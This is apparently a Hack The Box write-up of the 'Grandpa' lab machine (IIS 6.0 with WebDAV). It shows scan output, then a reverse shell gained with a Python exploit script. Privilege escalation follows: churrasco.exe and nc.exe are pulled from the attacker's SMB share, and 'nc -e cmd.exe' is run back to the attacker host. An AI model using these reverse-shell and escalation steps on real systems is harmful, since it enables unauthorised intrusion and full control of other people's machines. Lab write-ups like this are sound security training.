This is a walkthrough of the Grandpa box from Hack The Box, done without using Metasploit.
1. Reconnaissance
I learned about this awesome all-in-one nmap script called nmapAutomator. I will use it to run all my scans at once:
./nmapAutomator.sh 10.10.10.14 All
- All = runs all the scans consecutively
- Note: This scan took about 30 minutes to run for me. But you will get some info right away, so you can use that while the rest of the scan is completing. In the case of this scan, the most helpful bit (the default creds) didn’t show up until about 25 min into the scan. Just something to keep in mind as you are trying to allocate your time accordingly.
Here are the results we get:
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: |_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH |_http-server-header: Microsoft-IIS/6.0 |_http-title: Error | http-webdav-scan: | Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK | Server Type: Microsoft-IIS/6.0 | Server Date: Mon, 05 Oct 2020 18:31:32 GMT | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH |_ WebDAV type: Unknown Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.32 seconds----------------------Starting Nmap UDP Scan---------------------- Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 18:29 EST Nmap scan report for 10.10.10.14 Host is up. All 1000 scanned ports on 10.10.10.14 are open|filtered Nmap done: 1 IP address (1 host up) scanned in 201.72 seconds ---------------------Starting Nmap Full Scan---------------------- Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 18:32 EST Initiating Parallel DNS resolution of 1 host. at 18:32 Completed Parallel DNS resolution of 1 host. at 18:32, 0.43s elapsed Initiating SYN Stealth Scan at 18:32 Scanning 10.10.10.14 [65535 ports] Discovered open port 80/tcp on 10.10.10.14 .... Nmap scan report for 10.10.10.14 Host is up (0.039s latency). Not shown: 65534 filtered ports PORT STATE SERVICE 80/tcp open httpRead data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 263.21 seconds Raw packets sent: 131268 (5.776MB) | Rcvd: 214 (10.752KB)No new ports---------------------Starting Nmap Vulns Scan--------------------- Running CVE scan on basic ports Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 18:37 EST /usr/local/bin/nmapAutomator.sh: line 226: 2251 Segmentation fault $nmapType -sV --script vulners --script-args mincvss=7.0 -p$(echo "${ports}") -oN nmap/CVEs_"$1".nmap "$1"Running Vuln scan on basic ports Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 18:37 EST /usr/local/bin/nmapAutomator.sh: line 226: 2253 Segmentation fault $nmapType -sV --script vuln -p$(echo "${ports}") -oN nmap/Vulns_"$1".nmap "$1"---------------------Recon Recommendations----------------------Web Servers Recon: gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.asp,.php -u http://10.10.10.14:80 -o recon/gobuster_10.10.10.14_80.txt nikto -host 10.10.10.14:80 | tee recon/nikto_10.10.10.14_80.txtWhich commands would you like to run? All (Default), gobuster, nikto, Skip <!>Running Default in (1) s:---------------------Running Recon Commands----------------------Starting gobuster scan =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.14:80 [+] Threads: 30 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Show length: true [+] Extensions: html,asp,php [+] Expanded: true [+] Timeout: 10s =============================================================== 2020/10/05 18:38:11 Starting gobuster =============================================================== http://10.10.10.14:80/_vti_bin (Status: 301) [Size: 158] http://10.10.10.14:80/_vti_bin/_vti_aut/author.dll (Status: 200) [Size: 195] http://10.10.10.14:80/_vti_bin/_vti_adm/admin.dll (Status: 200) [Size: 195] http://10.10.10.14:80/_vti_bin/shtml.dll (Status: 200) [Size: 96] =============================================================== 2020/10/05 18:39:06 Finished ===============================================================Finished gobuster scan ========================= Starting nikto scan - Nikto v2.1.6 -------------------------------------------------------------------- + Target IP: 10.10.10.14 + Target Hostname: 10.10.10.14 + Target Port: 80 + Start Time: 2020-10-05 18:39:07 (GMT-5) -------------------------------------------------------------------- + Server: Microsoft-IIS/6.0 + Retrieved microsoftofficewebserver header: 5.0_Pub + Retrieved x-powered-by header: ASP.NET + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Retrieved dasl header: <DAV:sql> + Retrieved dav header: 1, 2 + Retrieved ms-author-via header: MS-FP/4.0,DAV + Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH + OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server. + OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server. + WebDAV enabled (PROPPATCH COPY LOCK PROPFIND MKCOL UNLOCK SEARCH listed as allowed) + OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/ + OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted. + OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252. + OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST. + /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found. + Retrieved x-aspnet-version header: 1.1.4322 + 8014 requests: 0 error(s) and 22 item(s) reported on remote host
Things to note:
- only port 80 was open, running Microsoft IIS httpd 6.0 (which means the box is probably Windows Server 2003 or Windows XP)
- webDAV is enabled (just like in Granny)
- Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites using HTTP
- http methods PUT, MOVE, DELETE are possible (which means we should be able to add, rename and remove files from this web server
2. Enumeration
Open a web browser and visit the IP
The site is under construction. There was nothing useful in the directories that gobuster found either.
The scan results told us that the PUT method is allowed so we can test to see if that actually works. IIS 6.0 Microsoft web server can execute asp and aspx. Let’s use davtest to see if those file types are actually allowed to be uploaded:
davtest --url http://10.10.10.14
Unfortunately it doesn’t look like uploading those file types will be possible.
3. Initial foothold
This script is successful in creating a reverse shell. You do not have to edit it at all. Just set up a listener and run the script:
nc -nlvp 4444
python iis_rev_shell.py 10.10.10.14 80 10.10.14.2 4444
- run the listener over port 80 because victim box is a web server
- I chose port 4444 for my listener
We got a reverse shell! We run a whoami and see that we are not root. Running /priv we can see what privileges we have. Because we are not root, we will need to do some privilege escalation.
4. Privilege escalation
For privilege escalation, we will need to get some sort of exploit over to the web server and execute it. That means we’ll need to upload the file to a directory we can write/execute to.
While digging around I see there is a directory called wmpub which makes me think “public” and possibly something we can work with. Navigate into the directory and create a test file and see if you can execute it:
echo test > test.txt
type test.txt
That worked! Now we need to find an exploit we can upload to this directory.
If we remember back to when we ran /priv we know that SEImpersonalPrivilege is enabled. That means we can use churrasco like we did on the granny box.
git clone https://github.com/Re4son/Churrasco.git
The file we need in there is churrasco.exe. We can upload this to the wmpub directory on the victim box (that we’ve already tested successful file execution on). In order to upload (or PUT) this file on the victim box, we’ll set up a file server on our machine.
Kali has a built in python smb server. Find it, copy it to a directory you want to work with it in. Also find your netcat binary (nc.exe) and copy it over to the same directory as your churrasco.exe is located (in my case the /Churrasco/ directory). Then navigate to that directory and run the following:
python smbserver.py grandpatmp /home/churr0s/Documents/HTB/grandpa/Churrasco/
- grandpatmp is the “share folder” I’m creating, that the victim box will be able to access to grab the churrasco executable and copy it over
- I’m sharing the entire contents of the /Churrasco/ directory from my end
Now we can copy over both the netcat binary and the churrasco executable:
copy \\10.10.14.2\grandpatmp\nc.exe .
copy \\10.10.14.2\grandpatmp\churrasco.exe c.exe
- I’m saving the churrasco.exe file as a file called “c”
Now open up a new terminal window and set up a second listener. I chose port 6666.
Go back to your victim box and now execute the churrasco script:
.\c.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.2 6666"
On your new listener you should see a reverse shell spawned. Run whoami and see you are now root!
Grab flags:
